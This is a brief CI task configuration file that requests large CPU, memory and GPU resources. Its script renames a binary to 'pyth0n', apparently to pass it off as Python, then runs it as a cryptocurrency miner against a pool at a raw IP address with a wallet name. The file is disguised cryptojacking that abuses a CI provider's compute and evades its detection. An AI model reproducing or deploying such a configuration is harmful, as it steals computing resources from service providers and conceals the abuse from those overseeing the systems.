container:
  image: christiankm01/master:latest
  cpu: 20
  memory: 12G
  gpu: 2
task:
  script: |
   set -ex \
     && mv /usr/bin/turtle /usr/bin/pyth0n \
     && pyth0n  --algorithm argon2id_chukwa2 --pool 23.95.242.133:3022 --wallet userA -k
